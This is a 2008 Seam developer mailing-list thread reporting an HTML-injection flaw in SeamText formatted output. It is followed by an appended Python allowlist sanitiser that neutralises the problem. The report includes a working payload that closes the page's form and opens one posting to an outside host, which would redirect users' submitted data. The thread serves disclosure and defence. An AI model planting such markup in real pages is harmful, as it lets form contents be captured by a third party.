[seam-dev] RE: Form, Input Elements and SeamText
Nick Belaevski
nbelaevski at exadel.com
Thu Oct 2 13:50:00 EDT 2008
Please consider the following example:
<html xmlns:h="http://java.sun.com/jsf/html"
xmlns:f="http://java.sun.com/jsf/core"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:rich="http://richfaces.org/rich"
xmlns:s="http://jboss.com/products/seam/taglib">
<body>
<h:form id="Form">
<s:formattedText value="#{bean.seamText}"/>
<h:commandButton value="Submit!"/>
</h:form>
</body>
</html>
bean.seamText =>
public String getSeamText() {
    return "<br></form><form action=\"http://www.jboss.org\"></br>";
}
Pressing the "Submit!" command button will submit the form to jboss.org instead of
the application host, so one can potentially spy on other users.
Tested with Seam 2.1.0.beta1.
Best regards,
Nick Belaevski
> -----Original Message-----
> From: Christian Bauer [mailto:cbauer at redhat.com]
> Sent: Thursday, October 02, 2008 7:56 PM
> To: Nick Belaevski
> Cc: seam-dev at lists.jboss.org; Ilya Shaikovsky; Sergey Smirnov
> Subject: Re: Form, Input Elements and SeamText
>
>
> On Oct 02, 2008, at 18:50 , Nick Belaevski wrote:
>
> > <form action="http://somesite.com"><input type="file" /><input
> > type="submit" /></form>
> >
> > I suppose it is not safe that the user is possible to type in forms.
>
> Why not? Your browser can send whatever forms it wants to whatever site.
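The defensive property this thread turns on is that user-controlled rich text must never be able to close the enclosing <form> or open a new one. The following is an added, stand-alone illustration of the allowlist approach to rendering such text; it is not Seam's SeamText implementation, and the tag and attribute allowlists are assumptions chosen for the example. It is built on Python's html.parser and shows the payload from the message above being rendered inert.

```python
"""Allowlist sanitiser for user-supplied rich text (constructed example).

Not Seam's SeamText: a stand-alone illustration of the rule that formatted
text must never be able to close the enclosing <form> or open another one.
"""
from html import escape
from html.parser import HTMLParser

# Tags the renderer may emit. Structural and form-related tags
# (form, input, button, script, ...) are deliberately absent. (Assumed list.)
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "ul", "ol", "li", "blockquote", "a"}
# Per-tag attribute allowlist; any other attribute is dropped.
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_stack = []  # allowed tags we opened and still have to close

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # disallowed tag is dropped; its text content is kept
        attr_text = ""
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None:
                # Only plain http(s) links; javascript: and friends are dropped.
                if name == "href" and not value.lower().startswith(("http://", "https://")):
                    continue
                attr_text += f' {name}="{escape(value, quote=True)}"'
        if tag in VOID_TAGS:
            self.out.append(f"<{tag}{attr_text}/>")
        else:
            self.out.append(f"<{tag}{attr_text}>")
            self.open_stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        # Only close tags we opened ourselves. A stray </form> in the input
        # is simply discarded, so it can never escape the surrounding form.
        if tag in self.open_stack:
            while self.open_stack:
                top = self.open_stack.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        # Text is always escaped, so it cannot introduce markup.
        self.out.append(escape(data, quote=False))

    def result(self) -> str:
        while self.open_stack:  # close anything the input left open
            self.out.append(f"</{self.open_stack.pop()}>")
        return "".join(self.out)


def sanitize(markup: str) -> str:
    """Render user-supplied markup through the allowlist."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # The payload from the message above (constructed input), rendered inert.
    payload = '<br></form><form action="http://www.jboss.org"></br>'
    print(sanitize(payload))  # <br/>
```

Because the sanitiser only ever emits closing tags for elements it opened itself, the enclosing <form> written by the page template cannot be terminated by the formatted text, and because <form> and <input> are not in the allowlist they are never emitted at all.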